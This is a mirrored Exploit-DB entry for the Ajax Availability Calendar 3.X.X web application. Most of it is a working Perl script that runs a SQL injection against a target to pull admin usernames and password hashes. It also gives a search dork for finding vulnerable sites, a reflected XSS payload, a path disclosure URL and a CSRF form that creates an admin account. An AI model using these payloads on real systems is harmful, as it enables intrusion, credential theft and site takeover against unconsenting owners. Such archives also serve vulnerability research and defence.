bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/25409.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

79 lines
No EOL
2.4 KiB
Text
Raw Blame History

Ajax Availability Calendar 3.X.X Multiple Vulnerabilties
==============================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.ajaxavailabilitycalendar.com/
.:. Dork : intitle:"Ajax Availability Calendar" , inurl:"/ac-admin/index.php"
####################################################################
===[ Exploit ]===
Sql Injection:
==============
#!/usr/bin/perl -w
# Ajax Availability Calendar 3.X.X Remote SQL Injection Vulnerability
# Author : AtT4CKxT3rR0r1ST
# Contact : F.Hack@w.cn
# Script : http://www.ajaxavailabilitycalendar.com/
# Admin Panel : www.site.com/ac-admin/
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "|----------------------------------------------------|\n";
print "| 'Ajax Availability Calendar 3.X.X' |\n";
print "| Coded by : AtT4CKxT3rR0r1ST |\n";
print "|----------------------------------------------------|\n";
use LWP::UserAgent;
print "\nInsert Target:";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress...\n";
print "\n";
#Nama Column
$Column="group_concat(username,0x3a,password)";
#Nama Table
$table="bookings_admin_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "?id_item=null and 1=2 union select ".$Column."+from/**/".$table."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/:(.*):([0-9a-fA-F]{32})/){
print "\n[+] Admin User : $1\n";
}if($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n";
print "[+] Success !!\n";
}
else{print "[-] Unable To Get The Information...\n";
}
Reflected XSS:
==============
www.site.com/?id_item='"--></style></script><script>alert(0x000581)</script>
Full Path Disclosure:
====================
www.site.com/ac-includes/common.inc.php
CSRF:
=====
[Add Admin]
-------------
<form method="POST" name="form0" action="http://www.site.com/ac-admin/index.php?page=admin_users&action=new">
<input type="hidden" name="add[username]" value="admin"/>
<input type="hidden" name="password" value="Palestine"/>
<input type="hidden" name="password2" value="Palestine"/>
</form>
</body>
</html>
####################################################################
Reference in a new issue View git blame Copy permalink